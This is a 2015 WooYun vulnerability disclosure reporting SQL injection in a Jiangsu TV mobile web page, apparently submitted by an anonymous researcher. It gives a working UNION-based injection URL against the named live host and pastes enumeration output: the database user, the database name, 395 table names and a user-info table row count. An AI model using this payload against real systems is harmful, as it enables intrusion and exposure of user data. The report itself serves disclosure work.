江苏卫视某站点MSSQL注射(支持union) | wooyun-2015-0119955

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0119955

漏洞标题：

江苏卫视某站点MSSQL注射(支持union)

漏洞详情

披露状态：

2015-06-12：细节已通知厂商并且等待厂商处理中
2015-06-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

江苏卫视某站点MSSQL注射(支持union)

详细说明：

http://3g.jstv.com:80/hd/2014_FCWR/Do.aspx?action=GetJMDB&date=2015-1-1' UNION ALL SELECT NULL,NULL,current_user-- &stypeid=141

漏洞证明：

发现数据库里有个D99_Tmp库，这说明已经被人拿工具测试过了。。。

current user:    'jstvuser'
current database:    'jstvlive'
Database: jstvlive
[395 tables]
+-----------------------------------------------+
| 315_commentinfo                               |
| Accounts_Department                           |
| Accounts_Log                                  |
| Accounts_PermissionCategories                 |
| Accounts_Permissions                          |
| Accounts_RolePermissions                      |
| Accounts_RoleType                             |
| Accounts_Roles                                |
| Accounts_UserRoles                            |
| Accounts_Users                                |
| AdClickInfo                                   |
| D99_Tmp                                       |
| ELMAH_Error                                   |
| ExperienceCode                                |
| ExperienceCode20130201                        |
| GPS_INFO                                      |
| HD_DSF_3JUINFOLIST                            |
| HD_DSF_MESSAGEINFO                            |
| HD_DSF_STORYINFO                              |
| Hd_winnerList                                 |
| KeyWordSearch                                 |
| Microfilm                                     |
| MicrofilmVote                                 |
| NewMission_Catalogue                          |
| NewMission_commentinfo                        |
| Number                                        |
| OperateLog                                    |
| SM_ABOUT                                      |
| SM_JSYL_INFO                                  |
| SM_PLAYER_INFO                                |
| SM_TOP_BANNER                                 |
| S_Tree                                        |
| Theme_2013Concert_Alist                       |
| Theme_2013Concert_Comment                     |
| Theme_2013Concert_DefaultPic                  |
| Theme_2013Concert_QAResult                    |
| Theme_2013Concert_Qlist                       |
| Theme_2013Concert_Scence                      |
| Theme_2013Concert_StarComment                 |
| Theme_2013Concert_StarList                    |
| Theme_2013Concert_StarMusicList               |
| Theme_2013Concert_StarMusicVote               |
| Theme_2013Concert_StarUpLog                   |
| Theme_2013Meeting_Notice                      |
| Theme_2013Spring_Alist                        |
| Theme_2013Spring_CheckIn                      |
| Theme_2013Spring_Comment                      |
| Theme_2013Spring_DefaultPic                   |
| Theme_2013Spring_ProgComment                  |
| Theme_2013Spring_ProgList                     |
| Theme_2013Spring_ProgUpLog                    |
| Theme_2013Spring_QAResult                     |
| Theme_2013Spring_Qlist                        |
| Theme_2013Spring_Scence                       |
| Theme_2013StarZhang_Comment                   |
| Theme_2013StarZhang_Vote                      |
| Theme_2013_YeayEndInventory                   |
| Theme_2013yaan_Vote                           |
| Theme_2014BaiRiYanHuo                         |
| Theme_2014BaiRiYanHuo_Guide                   |
| Theme_2014BaiRiYanHuo_Stills                  |
| Theme_2014BrazilWorldCup_CheckIn              |
| Theme_2014BrazilWorldCup_Comment              |
| Theme_2014BrazilWorldCup_Group                |
| Theme_2014BrazilWorldCup_Highlights           |
| Theme_2014BrazilWorldCup_News                 |
| Theme_2014BrazilWorldCup_Odds                 |
| Theme_2014BrazilWorldCup_Team                 |
| Theme_2014BrazilWorldCup_User                 |
| Theme_2014BrazilWorldCup_UserPrize            |
| Theme_2014BrazilWorldCup_Vod                  |
| Theme_2014BringYouTheStars_Card               |
| Theme_2014BringYouTheStars_Card_UserGain      |
| Theme_2014BringYouTheStars_Card_UserGuaLog    |
| Theme_2014BringYouTheStars_Comment            |
| Theme_2014BringYouTheStars_Highlights         |
| Theme_2014BringYouTheStars_Prize              |
| Theme_2014BringYouTheStars_Question           |
| Theme_2014BringYouTheStars_Question_Options   |
| Theme_2014BringYouTheStars_Stars              |
| Theme_2014BringYouTheStars_UserPrize          |
| Theme_2014BringYouTheStars_User_AnswerCount   |
| Theme_2014BringYouTheStars_User_Answer_Log    |
| Theme_2014BringYouTheStars_Vod                |
| Theme_2014BringYouTheStars_Zuoping            |
| Theme_2014ChineseNewYear                      |
| Theme_2014ChineseNewYear_Message              |
| Theme_2014ChineseNewYear_fudai_Prize          |
| Theme_2014ChineseNewYear_fudai_User_Prize     |
| Theme_2014ChineseNewYear_fudai_User_Prize_Log |
| Theme_2014ChineseNewYear_showType             |
| Theme_2014ChineseNewYear_wish                 |
| Theme_2014FCWR_Comment                        |
| Theme_2014FCWR_DQKD                           |
| Theme_2014FCWR_RQJB                           |
| Theme_2014JinXiuXian                          |
| Theme_2014JinXiuXian_Vod                      |
| Theme_2014JinXiuXian_XinCheng                 |
| Theme_2014JinXiuXian_ZHAN_Log                 |
| Theme_2014MH370                               |
| Theme_2014MH370_QF                            |
| Theme_2014MostBeautiful_Atlas                 |
| Theme_2014MostBeautiful_Atlas2                |
| Theme_2014MostBeautiful_Program               |
| Theme_2014MostBeautiful_Program2              |
| Theme_2014MostBeautiful_Report                |
| Theme_2014MostBeautiful_Report2               |
| Theme_2014QuestionAnswers                     |
| Theme_2014QuestionDescript                    |
| Theme_2014QuestionOptions                     |
| Theme_2014Questionnaire                       |
| Theme_2014RenPinBigBang                       |
| Theme_2014SpringZhengJi                       |
| Theme_2014SpringZhengJi_ZHAN_Log              |
| Theme_2014SuperTeam_FaceExercise              |
| Theme_2014SuperTeam_FaceLog                   |
| Theme_2014SuperTeam_FaceRightLog              |
| Theme_2014SuperTeam_Members                   |
| Theme_2014SuperTeam_MusicExercise             |
| Theme_2014SuperTeam_MusicLog                  |
| Theme_2014SuperTeam_MusicRightLog             |
| Theme_2014SuperTeam_News                      |
| Theme_2014SuperTeam_Program                   |
| Theme_2014SuperTeam_Team                      |
| Theme_2014SuperTeam_VotesLog                  |
| Theme_2014SuperTeam_Works                     |
| Theme_2014ValentinesDay                       |
| Theme_2014ValentinesDay_ZHAN_Log              |
| Theme_2014VideoRecommend                      |
| Theme_2014VideoWants                          |
| Theme_2014YouthOlympic_Atlas                  |
| Theme_2014YouthOlympic_Information            |
| Theme_2014YouthOlympic_Schedule               |
| Theme_2014_1111_Prize                         |
| Theme_2014_1111_Singer                        |
| Theme_2014_1111_UserPrize                     |
| Theme_2014_315_Comm                           |
| Theme_2014_TV_Templet_Comment                 |
| Theme_2014_TV_Templet_Content                 |
| Theme_2014_TV_Templet_Stills                  |
| Theme_2014_TV_Templet_Zcry                    |
| Theme_2014_YeayEndInventory                   |
| Theme_2014_YeayGoHome                         |
| Theme_2014_YeayGoHome_ZHANLog                 |
| Theme_2014_YeayGoHome_huoJiangUser            |
| Theme_2015ProgramCollect_BaseColumn           |
| Theme_2015ProgramCollect_Prog                 |
| Theme_2015_Cloumn_Content                     |
| Theme_2015_NewYearConcert                     |
| Theme_2015_SpringFestival                     |
| Theme_Baby2013List                            |
| Theme_Baby2013Platfrom                        |
| Theme_Baby2013Vote                            |
| Theme_CSL_LIST                                |
| Theme_ChineseValentinesDay_LQXY               |
| Theme_ChineseValentinesDay_SSSS               |
| Theme_ChineseValentinesDay_YJZQ               |
| Theme_ChineseValentinesDay_YJZQ_Comm          |
| Theme_ChineseValentinesDay_YJZQ_GL            |
| Theme_ChineseValentinesDay_ZHAN_Log           |
| Theme_EuroCup2012_Comment                     |
| Theme_EuroCup2012_Group                       |
| Theme_EuroCup2012_Guess                       |
| Theme_EuroCup2012_Remark                      |
| Theme_EuroCup2012_Scene                       |
| Theme_EuroCup2012_Team                        |
| Theme_EuroCup2012_Vod                         |
| Theme_Jump_Scence                             |
| Theme_Jump_ScenceDetail                       |
| Theme_Jump_StarList                           |
| Theme_Jump_StarUpLog                          |
| Theme_Jump_Vod                                |
| Theme_LiveJiangSu_AwardUser                   |
| Theme_LiveJiangSu_Content                     |
| Theme_LiveJiangSu_Reason                      |
| Theme_Midautumn2012_Comment                   |
| Theme_Midautumn2012_Main                      |
| Theme_Midautumn2013_Write                     |
| Theme_Midautumn2013_zhanLog                   |
| Theme_Olympic2012_AD                          |
| Theme_Olympic2012_Btype                       |
| Theme_Olympic2012_Comment                     |
| Theme_Olympic2012_Commentbak                  |
| Theme_Olympic2012_Country                     |
| Theme_Olympic2012_Proj                        |
| Theme_Olympic2012_ProjDet                     |
| Theme_Olympic2012_Scene                       |
| Theme_QuestionAnswers                         |
| Theme_QuestionDescript                        |
| Theme_QuestionOptions                         |
| Theme_Questionnaire                           |
| Theme_SingleHuaTang                           |
| Theme_SingleHuaTang_ZHANLog                   |
| Theme_SingleHuaTang_winUser                   |
| Theme_SuperMan_Scence                         |
| Theme_SuperMan_StarComment                    |
| Theme_SuperMan_StarList                       |
| Theme_SuperMan_StarUpLog                      |
| Theme_SuperMan_Vod                            |
| Theme_WXJS_TGHD_PrizeInfo                     |
| Theme_taobao_Remark                           |
| Theme_taobao_info                             |
| Tmp_GetNetMobileNum                           |
| UserCheckNumInfo                              |
| UserCheckNumInfo20130201                      |
| UserCheckNumInfobak                           |
| VideoCast                                     |
| VideoInfo                                     |
| VideoPlayInfo                                 |
| VideoStills                                   |
| VoteLog                                       |
| WeiBoList                                     |
| activity                                      |
| activity0630                                  |
| ad_newlist                                    |
| answer                                        |
| baoliaoInfo                                   |
| baoliao_user                                  |
| bx_push_equipmentInfo                         |
| bx_push_mobileinfo                            |
| bx_push_newsInfo                              |
| bx_push_positionInfo                          |
| bx_push_waitInfo                              |
| bx_traffic                                    |
| bx_ua_userinfo                                |
| bx_wap_Promo                                  |
| bx_wap_aboutus                                |
| bx_wap_guestbook                              |
| collection                                    |
| comment                                       |
| commentinfo                                   |
| discussLog                                    |
| downloadinfo                                  |
| fcwrad                                        |
| fcwrusers                                     |
| getNetUserLog                                 |
| getNetUserLog20130201                         |
| hot                                           |
| ip_userinfo                                   |
| keywordinfo                                   |
| lianyungang                                   |
| live_18da_default                             |
| live_18da_list                                |
| live_Comment                                  |
| live_adinfo                                   |
| live_aditems                                  |
| live_btypeinfo                                |
| live_defaulthot                               |
| live_info                                     |
| live_infobak                                  |
| live_infobakbak                               |
| live_playbill                                 |
| live_proginfo                                 |
| live_proginfo20120725                         |
| live_proginfobak                              |
| live_proginfobak2                             |
| live_progitems                                |
| live_progitemsbak                             |
| live_serverlist                               |
| live_stypeinfo                                |
| live_subjectComment                           |
| live_subjectVote                              |
| live_subjectVoteResult                        |
| loginlog                                      |
| mobileclientinfo                              |
| mobileinfo                                    |
| newNumber                                     |
| newactivity                                   |
| newadinfo                                     |
| newnews_adlist                                |
| newnews_favorites                             |
| newnews_info                                  |
| newnews_notice                                |
| newnews_pic                                   |
| newnews_type                                  |
| news_info                                     |
| news_type                                     |
| newsplayinfo                                  |
| nnewsplayinfo                                 |
| nplayinfo                                     |
| number2012                                    |
| pangolin_test_table                           |
| player_activity                               |
| playinfo                                      |
| playinfo2                                     |
| prizeLog                                      |
| prog_activity                                 |
| qrj_activity                                  |
| qrj_commentinfo                               |
| qrj_playinfo                                  |
| qrjgonglue                                    |
| radioInfo                                     |
| radioInfobak                                  |
| schedule                                      |
| score                                         |
| searchinfo                                    |
| sentMsgInfo                                   |
| series_proginfo                               |
| sgip_Deliver                                  |
| sgip_Deliver20110831                          |
| sgip_Deliver20120725                          |
| sgip_Deliver20130201                          |
| sgip_Deliverbak                               |
| sgip_Deliverbak2                              |
| sgip_port                                     |
| sgip_port20130201                             |
| sgip_submit                                   |
| sgip_submit20120601bak                        |
| sgip_submit20120725                           |
| sgip_submit20130201                           |
| stars                                         |
| sys_OftenQuestion                             |
| sysdiagrams                                   |
| t_group                                       |
| tc_info_Top                                   |
| tc_info_list                                  |
| title                                         |
| tp_activity                                   |
| user_liveinfo                                 |
| user_liveinfo20130201                         |
| user_liveinfo20130201_1                       |
| user_liveinfobak                              |
| userinfo                                      |
| userinfo20110831                              |
| userinfo20120613                              |
| userinfo20120725                              |
| userinfo20130201                              |
| userinfo20130205                              |
| userinfobak                                   |
| userinfobak20110221                           |
| users                                         |
| v_NewsFav                                     |
| v_NewsList                                    |
| v_NewsList2                                   |
| v_Promo                                       |
| v_PromoAdmin                                  |
| v_Theme_2015ProgramCollect_Prog               |
| v_a                                           |
| v_activity                                    |
| v_adlist                                      |
| v_adnewlist                                   |
| v_area                                        |
| v_b                                           |
| v_baoliao                                     |
| v_baoliaoUser                                 |
| v_collection                                  |
| v_discussLog                                  |
| v_govtypelist                                 |
| v_hot                                         |
| v_ipinfo                                      |
| v_livebtypeinfo                               |
| v_liveinfo                                    |
| v_liveplaybill                                |
| v_liveproginfo                                |
| v_liveproginfo2                               |
| v_livestypeinfo                               |
| v_newnews_type                                |
| v_newnewslist                                 |
| v_newnewstype                                 |
| v_news                                        |
| v_newsinfo                                    |
| v_notice                                      |
| v_num1                                        |
| v_number                                      |
| v_playinfo                                    |
| v_proginfoAndServer                           |
| v_pvinfo                                      |
| v_qrj_activity                                |
| v_qrjcommentInfo                              |
| v_qrjgonglue                                  |
| v_seriesproginfo                              |
| v_subjectlist                                 |
| v_traffic                                     |
| v_userinfo                                    |
| v_userinfoList                                |
| v_usersinfo                                   |
| v_vodFav                                      |
| v_votelog                                     |
| v_xhxc_Areatype                               |
| v_xhxccomment                                 |
| vac20120910                                   |
| vac20120913                                   |
| vac_20121214                                  |
| vac_Usertemp                                  |
| vac_user20120719                              |
| vacuser                                       |
| vod_fav                                       |
| wap_PlaySheet                                 |
| xhxc_Areatype                                 |
| xhxc_headpic                                  |
| xhxc_player                                   |
| xhxc_voter                                    |
| xhxcinfo                                      |
| zqgetnumLog                                   |
| zquserinfo                                    |
+-----------------------------------------------+
Database: jstvlive
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.v_userinfo | 273586  |
+----------------+---------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-17 11:48

厂商回复：

漏洞Rank：2 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云